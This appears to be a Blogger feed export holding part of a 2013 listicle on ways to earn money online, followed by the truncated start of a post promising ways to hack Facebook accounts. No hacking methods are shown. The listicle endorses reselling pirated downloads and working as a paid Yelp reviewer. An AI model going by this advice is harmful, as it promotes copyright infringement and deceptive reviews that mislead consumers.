The more online clout you have as a business, the more money you’ll make. If you’re known for making lasting connections (as is the case with GetVoiP above), then you’ll have no issues building your online brand. You’ll be recognized in your community and begin to build a buzz in your industry. Tracking your numbers (how many people view your site, click each ad, and make a purchase from that click) gives you the leverage to expand this part of your business, enabling you to continue building your online rep.&lt;/div&gt;
&lt;h2 style=&quot;background-color: white; color: #333333; font-family: Lato, arial, sans-serif; font-size: 28px; line-height: 40px; margin: 40px 0px 10px; text-rendering: optimizelegibility;&quot;&gt;
&lt;b&gt;3.&amp;nbsp;&lt;a href=&quot;http://www.lifehack.org/articles/money/www.google.com/adsense&quot; style=&quot;color: #0088cc; text-decoration: none;&quot;&gt;Google Adsense&lt;/a&gt;&lt;/b&gt;&lt;/h2&gt;
&lt;div style=&quot;background-color: white; color: #595959; font-family: Lato, arial, sans-serif; font-size: 18px; line-height: 29px; margin-bottom: 20px; word-spacing: 2px;&quot;&gt;
If that sounds like too much technical information for you, there is an easy button – Google’s advertising platform is as simple as signing up, enabling (on Blogger) or pasting a small code on your website, and allowing the advertisements to automatically roll in. The problem with this program is that you don’t get any commissions – and you don’t get to control the ad content. This is useful for some, but powerful users will want something a little more robust.&lt;/div&gt;
&lt;h2 style=&quot;background-color: white; color: #333333; font-family: Lato, arial, sans-serif; font-size: 28px; line-height: 40px; margin: 40px 0px 10px; text-rendering: optimizelegibility;&quot;&gt;
&lt;b&gt;4.&amp;nbsp;&lt;a href=&quot;https://affiliate-program.amazon.com/&quot; style=&quot;color: #0088cc; text-decoration: none;&quot;&gt;Amazon Associates&lt;/a&gt;&lt;/b&gt;&lt;/h2&gt;
&lt;div style=&quot;background-color: white; color: #595959; font-family: Lato, arial, sans-serif; font-size: 18px; line-height: 29px; margin-bottom: 20px; word-spacing: 2px;&quot;&gt;
Amazon has an Associates program for site owners and bloggers. They offer a search tool to find the right products and services from their site and a variety of ad styles to display on your site, including text-based and banner images (digital billboards) like this:&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #595959; font-family: Lato, arial, sans-serif; font-size: 18px; line-height: 29px; margin-bottom: 20px; word-spacing: 2px;&quot;&gt;
Each item purchased through your Amazon links give you a commission. It doesn’t take high volume traffic to achieve results, either. I began making money with the program when I only had 1,000 hits per month on my site. They can apply your earnings to your Amazon account balance, issue you a check, or direct deposit into your bank account. If you love Amazon, you’ll love their associate’s program.&lt;/div&gt;
&lt;h2 style=&quot;background-color: white; color: #333333; font-family: Lato, arial, sans-serif; font-size: 28px; line-height: 40px; margin: 40px 0px 10px; text-rendering: optimizelegibility;&quot;&gt;
&lt;b&gt;5.&amp;nbsp;&lt;a href=&quot;http://www.linkshare.com/&quot; style=&quot;color: #0088cc; text-decoration: none;&quot;&gt;Rakuten Linkshare&lt;/a&gt;&lt;/b&gt;&lt;/h2&gt;
&lt;div style=&quot;background-color: white; color: #595959; font-family: Lato, arial, sans-serif; font-size: 18px; line-height: 29px; margin-bottom: 20px; word-spacing: 2px;&quot;&gt;
Amazon and Google are far from your only options for online advertising. Rakuten Linkshare is a great place to search for other affiliates for your ads. Through their program, you can get customized ad links, email links, and banner ads for Starbucks, Walmart, iTunes, and a slew of other popular brands. With this program, you can also find smaller companies, regional or specialized brands, and more. I run a combination of Google, Amazon, and Rakuten’s programs, and my monthly income is approximately $150 from these programs. It’s not a lot of money, but it’s also not a lot of work for residual (it means recurring…since the ads are permanent…) income.&lt;/div&gt;
&lt;h2 style=&quot;background-color: white; color: #333333; font-family: Lato, arial, sans-serif; font-size: 28px; line-height: 40px; margin: 40px 0px 10px; text-rendering: optimizelegibility;&quot;&gt;
&lt;b&gt;6. Company Referral Programs&lt;/b&gt;&lt;/h2&gt;
&lt;div style=&quot;background-color: white; color: #595959; font-family: Lato, arial, sans-serif; font-size: 18px; line-height: 29px; margin-bottom: 20px; word-spacing: 2px;&quot;&gt;
Speaking of the benefits of permanent ads, banners and links aren’t the only ways to earn a little bit of dough off your online endeavors. By having a website, you gain the power of emailing companies to ask them for things. I have no shame in letting the yoga company whose mat I’m looking into purchasing know that I have a blog and write for yoga publications – it sometimes gets me discounts.&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #595959; font-family: Lato, arial, sans-serif; font-size: 18px; line-height: 29px; margin-bottom: 20px; word-spacing: 2px;&quot;&gt;
Other times, I gain a valuable business contact in PR, advertising, or other aspects of corporate sales. Sometimes I just get a free drink. Either way, money in and of itself is worthless. Ditch the middle man and use the internet to barter what you have and can do for what you need.&lt;/div&gt;
&lt;h2 style=&quot;background-color: white; color: #333333; font-family: Lato, arial, sans-serif; font-size: 28px; line-height: 40px; margin: 40px 0px 10px; text-rendering: optimizelegibility;&quot;&gt;
&lt;b&gt;7.&amp;nbsp;&lt;a href=&quot;http://klout.com/home&quot; style=&quot;color: #0088cc; text-decoration: none;&quot;&gt;Klout&lt;/a&gt;&lt;/b&gt;&lt;/h2&gt;
&lt;div style=&quot;background-color: white; color: #595959; font-family: Lato, arial, sans-serif; font-size: 18px; line-height: 29px; margin-bottom: 20px; word-spacing: 2px;&quot;&gt;
If you have a social media account, try out Klout. The company tracks your social media usage, determines how big and what type of audience you draw based on the subject matter of your updates and posts. Using this information, you’re qualified to receive free items, tickets, etc. Check their website often to find ways of earning free stuff by doing what you’re already doing online…boring the rest of us…&lt;/div&gt;
&lt;h2 style=&quot;background-color: white; color: #333333; font-family: Lato, arial, sans-serif; font-size: 28px; line-height: 40px; margin: 40px 0px 10px; text-rendering: optimizelegibility;&quot;&gt;
&lt;b&gt;8. EBay&lt;/b&gt;&lt;/h2&gt;
&lt;div style=&quot;background-color: white; color: #595959; font-family: Lato, arial, sans-serif; font-size: 18px; line-height: 29px; margin-bottom: 20px; word-spacing: 2px;&quot;&gt;
If you have anything you want to sell, then EBay is the place you need to seriously consider doing it first. Personally I’m not a fan of the site because of the work it takes to build up a reputation. If you’re willing to grind through that process, you’ll be rewarded with many privileges – people have gotten rich selling books about how they got rich selling everything on EBay&lt;b&gt;.&lt;/b&gt;&lt;/div&gt;
&lt;h2 style=&quot;background-color: white; color: #333333; font-family: Lato, arial, sans-serif; font-size: 28px; line-height: 40px; margin: 40px 0px 10px; text-rendering: optimizelegibility;&quot;&gt;
&lt;b&gt;9.&amp;nbsp;&lt;a href=&quot;http://www.amazon.com/&quot; style=&quot;color: #0088cc; text-decoration: none;&quot;&gt;Amazon&lt;/a&gt;&lt;/b&gt;&lt;/h2&gt;
&lt;div style=&quot;background-color: white; color: #595959; font-family: Lato, arial, sans-serif; font-size: 18px; line-height: 29px; margin-bottom: 20px; word-spacing: 2px;&quot;&gt;
If you start getting too big for EBay or decide you want to try a different flavor, Amazon has a marketplace as well. I prefer using Amazon because I can depend on their shipping, have a Prime account, and trust their reviews (overall, not usually singularly, although occasionally that as well).&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #595959; font-family: Lato, arial, sans-serif; font-size: 18px; line-height: 29px; margin-bottom: 20px; word-spacing: 2px;&quot;&gt;
The difference between Amazon and EBay is that EBay (though still filled with new items) is seen as a used marketplace between individual parties, whereas Amazon (which is filled with offers for new and used merchandise from the 3&lt;span style=&quot;font-size: 14px; line-height: 0; position: relative; top: -0.5em; vertical-align: baseline;&quot;&gt;rd&lt;/span&gt;parties) is viewed as a Wal-Mart-type superstore. As a consumer, this difference leads me to use Amazon, so it only makes sense to target on my own demographic.&lt;/div&gt;
&lt;h2 style=&quot;background-color: white; color: #333333; font-family: Lato, arial, sans-serif; font-size: 28px; line-height: 40px; margin: 40px 0px 10px; text-rendering: optimizelegibility;&quot;&gt;
&lt;b&gt;10.&amp;nbsp;&lt;a href=&quot;http://www.etsy.com/&quot; style=&quot;color: #0088cc; text-decoration: none;&quot;&gt;Etsy&lt;/a&gt;&lt;/b&gt;&lt;/h2&gt;
&lt;div style=&quot;background-color: white; color: #595959; font-family: Lato, arial, sans-serif; font-size: 18px; line-height: 29px; margin-bottom: 20px; word-spacing: 2px;&quot;&gt;
If you’re crafty (and I mean that in more than one way, wink wink), you’ll enjoy Etsy. Handcrafted items are the bread and butter here. Plenty of people make decent side money on the site, which is basically an EBay for crafters and artists. Set up a sellers account with Etsy, and you’ll be asked to set up your virtual storefront and put up at least 5 goods for sale.&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #595959; font-family: Lato, arial, sans-serif; font-size: 18px; line-height: 29px; margin-bottom: 20px; word-spacing: 2px;&quot;&gt;
Once you have this down, you’ll be a budding Etsy entrepreneur. Provide great quality to your customers, and they’ll often return. Many people are willing to pay a premium for quality handmade designs. Etsy (like EBay and Amazon) takes a cut off the top for selling items through their site. PayPal takes another cut, and you have to be careful with taxes on all income, so be diligent while building your online business.&lt;/div&gt;
&lt;h2 style=&quot;background-color: white; color: #333333; font-family: Lato, arial, sans-serif; font-size: 28px; line-height: 40px; margin: 40px 0px 10px; text-rendering: optimizelegibility;&quot;&gt;
&lt;b&gt;11.&amp;nbsp;&lt;a href=&quot;http://www.craigslist.org/&quot; style=&quot;color: #0088cc; text-decoration: none;&quot;&gt;Craigslist&lt;/a&gt;&lt;/b&gt;&lt;/h2&gt;
&lt;div style=&quot;background-color: white; color: #595959; font-family: Lato, arial, sans-serif; font-size: 18px; line-height: 29px; margin-bottom: 20px; word-spacing: 2px;&quot;&gt;
Craigslist is the modern equivalent of the classified ads that dominated the days of newspapers. These quick ads are easy to navigate and use, and they’re geographically linked. Whether you’re selling something or offering a service,&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #595959; font-family: Lato, arial, sans-serif; font-size: 18px; line-height: 29px; margin-bottom: 20px; word-spacing: 2px;&quot;&gt;
Posting ads on Craigslist is technically easy, but people often have fears about posting their personal information on the site. I communicate mostly through email when doing business on Craigslist, and I’ve never run into any issues. I’ve never been ripped off, nor have I been murdered or raped for using the site. It takes common sense, so use your best judgment, but don’t assume someone is a thief just because of their preferred communication method. For an extra bonus, google “funny Craigslist ads” to see some delightful examples of guerilla and grassroots marketing.&lt;/div&gt;
&lt;h2 style=&quot;background-color: white; color: #333333; font-family: Lato, arial, sans-serif; font-size: 28px; line-height: 40px; margin: 40px 0px 10px; text-rendering: optimizelegibility;&quot;&gt;
&lt;b&gt;12.&amp;nbsp;&lt;a href=&quot;http://www.indeed.com/&quot; style=&quot;color: #0088cc; text-decoration: none;&quot;&gt;Indeed&lt;/a&gt;&lt;/b&gt;&lt;/h2&gt;
&lt;div style=&quot;background-color: white; color: #595959; font-family: Lato, arial, sans-serif; font-size: 18px; line-height: 29px; margin-bottom: 20px; word-spacing: 2px;&quot;&gt;
Maybe what you need is a job. It doesn’t matter which job search site you prefer using (even Craigslist) – Indeed tracks them all, and then some. You can find jobs posted on company websites, through temp agencies, and more at Indeed. If money is something you really need, Indeed is most definitely the place you want to visit to browse career opportunities.&lt;/div&gt;
&lt;h2 style=&quot;background-color: white; color: #333333; font-family: Lato, arial, sans-serif; font-size: 28px; line-height: 40px; margin: 40px 0px 10px; text-rendering: optimizelegibility;&quot;&gt;
&lt;b&gt;13.&amp;nbsp;&lt;a href=&quot;https://www.elance.com/&quot; style=&quot;color: #0088cc; text-decoration: none;&quot;&gt;Elance&lt;/a&gt;&lt;/b&gt;&lt;/h2&gt;
&lt;div style=&quot;background-color: white; color: #595959; font-family: Lato, arial, sans-serif; font-size: 18px; line-height: 29px; margin-bottom: 20px; word-spacing: 2px;&quot;&gt;
Where Indeed excels at finding job postings across the web and acting as a search crawler for employment, maybe a full-fledged career is too big of a commitment at this point in your life. Elance is a site to find freelance work of all types. I’ve used it for quick writing, editing, copywriting, resume building, and other odd jobs and temp gigs. The experience has been great.&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #595959; font-family: Lato, arial, sans-serif; font-size: 18px; line-height: 29px; margin-bottom: 20px; word-spacing: 2px;&quot;&gt;
Elance offers a wide array of technical, data entry, accounting, and other freelance and temp gigs. If you’re just looking for something short and sweet, log in, input and showcase your marketable skills, and begin searching through their job database, using any parameters you desire. Once you submit a bid, you’ll receive an acceptance or denial – you may get a few rejections, but don’t sweat it. Negotiate the terms of your bid, and get to work. You have money to make.&lt;/div&gt;
&lt;h2 style=&quot;background-color: white; color: #333333; font-family: Lato, arial, sans-serif; font-size: 28px; line-height: 40px; margin: 40px 0px 10px; text-rendering: optimizelegibility;&quot;&gt;
&lt;b&gt;14.&amp;nbsp;&lt;a href=&quot;https://www.mturk.com/mturk/welcome&quot; style=&quot;color: #0088cc; text-decoration: none;&quot;&gt;Mturk&lt;/a&gt;&lt;/b&gt;&lt;/h2&gt;
&lt;div style=&quot;background-color: white; color: #595959; font-family: Lato, arial, sans-serif; font-size: 18px; line-height: 29px; margin-bottom: 20px; word-spacing: 2px;&quot;&gt;
If you’ve heard of crowdsourcing (and even if you haven’t), Amazon’s Mechanical Turk program is a great place to get involved. Much like at Elance, you input your info and skills. You then are able to search for different menial tasks ranging from identifying inappropriate web content to transcribing audio recordings to basic data entry work.&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #595959; font-family: Lato, arial, sans-serif; font-size: 18px; line-height: 29px; margin-bottom: 20px; word-spacing: 2px;&quot;&gt;
Just like at any other job, the more work you do, and the better your quality, the more opportunities you’ll have to make money. The payouts are often small, and your payment is received in Amazon credit, but Mturk is a great place to make mindless money while veg’ing on the couch watching TV.&lt;/div&gt;
&lt;h2 style=&quot;background-color: white; color: #333333; font-family: Lato, arial, sans-serif; font-size: 28px; line-height: 40px; margin: 40px 0px 10px; text-rendering: optimizelegibility;&quot;&gt;
&lt;b&gt;15.&amp;nbsp;&lt;a href=&quot;http://www.linkedin.com/&quot; style=&quot;color: #0088cc; text-decoration: none;&quot;&gt;LinkedIn&lt;/a&gt;&lt;/b&gt;&lt;/h2&gt;
&lt;div style=&quot;background-color: white; color: #595959; font-family: Lato, arial, sans-serif; font-size: 18px; line-height: 29px; margin-bottom: 20px; word-spacing: 2px;&quot;&gt;
LinkedIn is a social media site for professionals. This isn’t a direct way to make money, but it’s a great way to connect to your current and potential peers, customers, clients, vendors, and more here. You’ll build a reputation and get in the loop on important developments in your chosen career path and/or industry. One day an old college buddy may hit you up for a dream job you never considered at the exact moment you are looking for a new vocation. Whether you like it or not, keeping your LinkedIn profile current is a great way to get surprised with new work opportunities out the blue.&lt;/div&gt;
&lt;h2 style=&quot;background-color: white; color: #333333; font-family: Lato, arial, sans-serif; font-size: 28px; line-height: 40px; margin: 40px 0px 10px; text-rendering: optimizelegibility;&quot;&gt;
&lt;b&gt;16.&amp;nbsp;&lt;a href=&quot;http://www.care.com/&quot; style=&quot;color: #0088cc; text-decoration: none;&quot;&gt;Care.com&lt;/a&gt;&lt;/b&gt;&lt;/h2&gt;
&lt;div style=&quot;background-color: white; color: #595959; font-family: Lato, arial, sans-serif; font-size: 18px; line-height: 29px; margin-bottom: 20px; word-spacing: 2px;&quot;&gt;
If you’re an experienced nanny or babysitter, Care.com is the place you want to make money. By listing yourself on the Craigslist of Childcare, you’ll broaden your reach and increase your odds of finding the right gig at the right time. You can be pickier with what kids you watch when you have the reputation and traffic to pull in more customers. Join Care.com and start making money by investing in the future of our youth.&lt;/div&gt;
&lt;h2 style=&quot;background-color: white; color: #333333; font-family: Lato, arial, sans-serif; font-size: 28px; line-height: 40px; margin: 40px 0px 10px; text-rendering: optimizelegibility;&quot;&gt;
&lt;b&gt;17.&amp;nbsp;&lt;a href=&quot;http://thepiratebay.sx/&quot; style=&quot;color: #0088cc; text-decoration: none;&quot; target=&quot;_blank&quot;&gt;ThePirateBay&lt;/a&gt;&lt;/b&gt;&lt;/h2&gt;
&lt;div style=&quot;background-color: white; color: #595959; font-family: Lato, arial, sans-serif; font-size: 18px; line-height: 29px; margin-bottom: 20px; word-spacing: 2px;&quot;&gt;
I support bootlegging – I don’t see it as being immoral or unethical in any way. I used to bootleg quite a bit in my youth, and I still do on occasion today (although not yet today in particular, I more meant “in the present”). If you want to hustle for your money, do what you must, baby. Download some software, music, movies, or other assorted digital goodness here and start slangin. It’s not an easy life, but sometimes you gotta do what you gotta do.&lt;/div&gt;
&lt;h2 style=&quot;background-color: white; color: #333333; font-family: Lato, arial, sans-serif; font-size: 28px; line-height: 40px; margin: 40px 0px 10px; text-rendering: optimizelegibility;&quot;&gt;
&lt;b&gt;18. iTunes&lt;/b&gt;&lt;/h2&gt;
&lt;div style=&quot;background-color: white; color: #595959; font-family: Lato, arial, sans-serif; font-size: 18px; line-height: 29px; margin-bottom: 20px; word-spacing: 2px;&quot;&gt;
If you’re a musician, writer, artist, tech nerd, pundit, or can produce any type of audio, video, or text worth consuming, you may be able to sell some stuff in Apple’s flagship iTunes store. By selling your work here, you’re able to stand next to the marketing clout of big business. You can make a healthy living off the iTunes store, and there’s no better time than now.&lt;/div&gt;
&lt;h2 style=&quot;background-color: white; color: #333333; font-family: Lato, arial, sans-serif; font-size: 28px; line-height: 40px; margin: 40px 0px 10px; text-rendering: optimizelegibility;&quot;&gt;
&lt;b&gt;19.&amp;nbsp;&lt;a href=&quot;http://www.yelp.com/&quot; style=&quot;color: #0088cc; text-decoration: none;&quot;&gt;Yelp!&lt;/a&gt;&lt;/b&gt;&lt;/h2&gt;
&lt;div style=&quot;background-color: white; color: #595959; font-family: Lato, arial, sans-serif; font-size: 18px; line-height: 29px; margin-bottom: 20px; word-spacing: 2px;&quot;&gt;
If you have a business, you want to get listed on Yelp! You may not use the software, but some people do, and they use it religiously (and I don’t mean they’ll kill you over it). By listing your business on Yelp!, you’re putting yourself on the map. From here, you also need to start using Yelp! Write reviews of places you go. It’ll be worth it in the long run.&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #595959; font-family: Lato, arial, sans-serif; font-size: 18px; line-height: 29px; margin-bottom: 20px; word-spacing: 2px;&quot;&gt;
Soon, you’ll have a dozen or so reviews under your belt and can hire yourself out as a Yelp! reviewer. There are ethical and moral questions to doing this, but the title of this piece is “ways to make money,” not “ethical ways to make money,” and I am a former Bank of America/Countrywide employee, so what’d you expect?&lt;/div&gt;
&lt;h2 style=&quot;background-color: white; color: #333333; font-family: Lato, arial, sans-serif; font-size: 28px; line-height: 40px; margin: 40px 0px 10px; text-rendering: optimizelegibility;&quot;&gt;
&lt;b&gt;20.&amp;nbsp;&lt;a href=&quot;http://www.wikipedia.org/&quot; style=&quot;color: #0088cc; text-decoration: none;&quot;&gt;Wikipedia&lt;/a&gt;&lt;/b&gt;&lt;/h2&gt;
&lt;div style=&quot;background-color: white; color: #595959; font-family: Lato, arial, sans-serif; font-size: 18px; line-height: 29px; margin-bottom: 20px; word-spacing: 2px;&quot;&gt;
&lt;b&gt;&lt;/b&gt;Another seemingly free site you can make money from is Wikipedia. People who say it’s easy to edit Wikipedia have clearly never tried editing Wikipedia – it’s a pain. Thankfully it’s a pain for companies as well, so many of them are willing to pay editors to assist them in the editing process. You’ll become a bounty hunter in a way, choosing your own lines to cross and keep. If editing is something you like to do, and you’re willing to put in the work it takes to learn Wikipedia’s dispute process, roll up your sleeves and try this one out.&lt;/div&gt;
&lt;h2 style=&quot;background-color: white; color: #333333; font-family: Lato, arial, sans-serif; font-size: 28px; line-height: 40px; margin: 40px 0px 10px; text-rendering: optimizelegibility;&quot;&gt;
&lt;b&gt;21.&amp;nbsp;&lt;a href=&quot;http://blogspot.com/&quot; style=&quot;color: #0088cc; text-decoration: none;&quot;&gt;Blogging&lt;/a&gt;&lt;/b&gt;&lt;/h2&gt;
&lt;div style=&quot;background-color: white; color: #595959; font-family: Lato, arial, sans-serif; font-size: 18px; line-height: 29px; margin-bottom: 20px; word-spacing: 2px;&quot;&gt;
I make the bulk of my money from blogging. In addition to the advertising revenue streams mentioned above, I also receive flat rate payments for blogging from various blogs throughout the web. I’m paid to write as a whistleblower, financial analyst, reviewer, commentator, and more. Writing for other sites builds traffic to my personal blog. The traffic for this blog gives me clout to present to advertisers.&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #595959; font-family: Lato, arial, sans-serif; font-size: 18px; line-height: 29px; margin-bottom: 20px; word-spacing: 2px;&quot;&gt;
To create your own blog, you don’t even need a web domain. You can start a completely free blog on either WordPress or Blogger. Each of these sites has its ups and downs, but you can’t beat the price. You generally want to keep blog posts between 150-500 words until you have a few dozen under your belt. Links between your blog posts encourage people to stay on your blog once they find it, increasing traffic. Once your blog is up, promote it on social media for the greatest effect.&lt;/div&gt;
&lt;h2 style=&quot;background-color: white; color: #333333; font-family: Lato, arial, sans-serif; font-size: 28px; line-height: 40px; margin: 40px 0px 10px; text-rendering: optimizelegibility;&quot;&gt;
&lt;b&gt;22.&amp;nbsp;&lt;a href=&quot;http://www.kickstarter.com/&quot; style=&quot;color: #0088cc; text-decoration: none;&quot;&gt;Kickstarter&lt;/a&gt;&lt;/b&gt;&lt;/h2&gt;
&lt;div style=&quot;background-color: white; color: #595959; font-family: Lato, arial, sans-serif; font-size: 18px; line-height: 29px; margin-bottom: 20px; word-spacing: 2px;&quot;&gt;
If you have a passion project, Kickstarter may be exactly what you need to get it off the ground. Celebs like Zach Braff and Melissa Joan Hart have used this site in attempts to fund their movie projects. Some crack dealers in Canada inspired a “crackstarter” campaign from Gawker for pictures of the Toronto mayor smoking crack with them. All you need is a dream, a goal, a budget, and a great pitch to convince people to come to the site and donate to your Kickstarter campaign. Panhandling isn’t dead – it’s gone digital…&lt;/div&gt;
&lt;h2 style=&quot;background-color: white; color: #333333; font-family: Lato, arial, sans-serif; font-size: 28px; line-height: 40px; margin: 40px 0px 10px; text-rendering: optimizelegibility;&quot;&gt;
&lt;b&gt;23. Extreme Couponing&lt;/b&gt;&lt;/h2&gt;
&lt;div style=&quot;background-color: white; color: #595959; font-family: Lato, arial, sans-serif; font-size: 18px; line-height: 29px; margin-bottom: 20px; word-spacing: 2px;&quot;&gt;
If you’ve never heard of extreme couponing. Once you’re versed on the idea, what you have to do is a bit difficult at first, but it’s a great way to both save and make money: go to hip2save.com and get a feel for the types of deals that are out there (both online and in the physical world). Once you’re comfortable with the process, start searching for the best deals in grocery, retail, and online shopping. After a month or two of extreme couponing, you’ll have enough cleaning, hygiene, and food supplies stocked up to save a noticeable amount of money. Now maybe you don’t need to make as much…?&lt;/div&gt;
&lt;h2 style=&quot;background-color: white; color: #333333; font-family: Lato, arial, sans-serif; font-size: 28px; line-height: 40px; margin: 40px 0px 10px; text-rendering: optimizelegibility;&quot;&gt;
&lt;strong&gt;24. Social Media&lt;/strong&gt;&lt;/h2&gt;
&lt;div style=&quot;background-color: white; color: #595959; font-family: Lato, arial, sans-serif; font-size: 18px; line-height: 29px; margin-bottom: 20px; word-spacing: 2px;&quot;&gt;
No matter what you do to make money online, promote it on your social media accounts. You have a base of people who are already interested in you and have a vested interest in your brand – why would you not want to take advantage of that? By promoting yourself and your projects on your social media accounts, you’re greatly increasing the chances of people actually giving you money in exchange for your goods and services. Stop being shy and get out there.&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://gouravinfo.blogspot.com/feeds/4277046663375536153/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://gouravinfo.blogspot.com/2013/10/top-24-ways-to-earn-money-online.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/4277046663375536153'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/4277046663375536153'/><link rel='alternate' type='text/html' href='http://gouravinfo.blogspot.com/2013/10/top-24-ways-to-earn-money-online.html' title='Top 24 Ways to Earn Money Online'/><author><name>Gourav Ratnawat</name><uri>http://www.blogger.com/profile/03815155318390279322</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIZoLmC65AXKrNABnNfxhzeowPYCsr93DX9SQDkIH_2SEiHQddadPoboFvNG0_zEDxj6lGmengwWk33scEp3cO0HegFS-kxERyTDTOrM2tMtgbhtE_4_a7jORklx4yVGs/s220/FB_IMG_1557336607561.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-276484908558385294.post-4801128672973467144</id><published>2013-10-24T23:16:00.002+05:30</published><updated>2013-10-25T23:50:45.437+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Ethical Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Facebook"/><title type='text'>Top 5 Ways to Hack Facebook Account</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; font-family: Arial, Tahoma, Verdana; font-size: 12px; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; font-family: Arial, Tahoma, Verdana; font-size: 12px; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; font-family: Arial, Tahoma, Verdana; font-size: 12px; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwurW72qD69I10km9twjj9UKmBGBjT_ghsHhVxyE_IcVf-hjg64AC66ehYg8wtGRL59ZEl0j5fJdsszfcLwPeoim69I1B-OqmaBNEd9u0pkdAglSwaV1x4RmNLCtmhCkuRQetfjlBNv_g/s1600/images+(1).jpg&quot; imageanchor=&quot;1&quot; style=&quot;color: #a91b33; margin-left: 1em; margin-right: 1em; text-decoration: none;&quot; wrc_done=&quot;true&quot;&gt;&lt;img border=&quot;0&quot; class=&quot;imagedropshadow&quot; height=&quot;237&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwurW72qD69I10km9twjj9UKmBGBjT_ghsHhVxyE_IcVf-hjg64AC66ehYg8wtGRL59ZEl0j5fJdsszfcLwPeoim69I1B-OqmaBNEd9u0pkdAglSwaV1x4RmNLCtmhCkuRQetfjlBNv_g/s320/images+(1).jpg&quot; style=&quot;border: 1px solid rgb(239, 239, 239); padding: 5px;&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;
&lt;span style=&quot;font-size: medium; text-align: justify;&quot;&gt;&lt;b&gt;E&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;text-align: justify;&quot;&gt;very day i get lot of comments and &amp;nbsp;emails asking questions related to&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;text-align: justify;&quot;&gt;Facebook Hacking&lt;/b&gt;&lt;span style=&quot;text-align: justify;&quot;&gt;, I get tired and&amp;nbsp;frustrated answering the same questions every single day, So to make life easy &amp;nbsp;for me and my blog readers &amp;nbsp;today i will share the best and successful ways by which you can hack a&lt;b&gt;&amp;nbsp;face book Account in 2013.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;
&lt;span style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;
&lt;span style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;background-color: #e3f0f2; font-family: Georgia, &#39;Times New Roman&#39;, serif; font-size: 15px; font-weight: bold; text-align: left;&quot;&gt;Is it Possible To Hack Any FaceBook Account ?&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;color: #cc0000; font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;&lt;b&gt;Yes!&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;background-color: white; font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;&amp;nbsp;As a matter of fact, almost anything can be hacked. But before you learn the real ways to Hack Facebook account, the following are the things you should be aware of&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot; /&gt;
&lt;b style=&quot;font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;1.&amp;nbsp;&lt;/b&gt;&lt;span style=&quot;background-color: white; font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;There is no ready made software that can&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;Hack Facebook Accounts&lt;/b&gt;&lt;span style=&quot;background-color: white; font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;&amp;nbsp;and get you the password with just a click of a button. So if you come&amp;nbsp;across&amp;nbsp;any website that claims to sell such&amp;nbsp;software&#39;s, I would advise you not to&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;trust them&lt;/b&gt;&lt;span style=&quot;background-color: white; font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot;&gt;.&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;font-family: Arial, Tahoma, Verdana; font-size: 12px;&quot; /&gt;
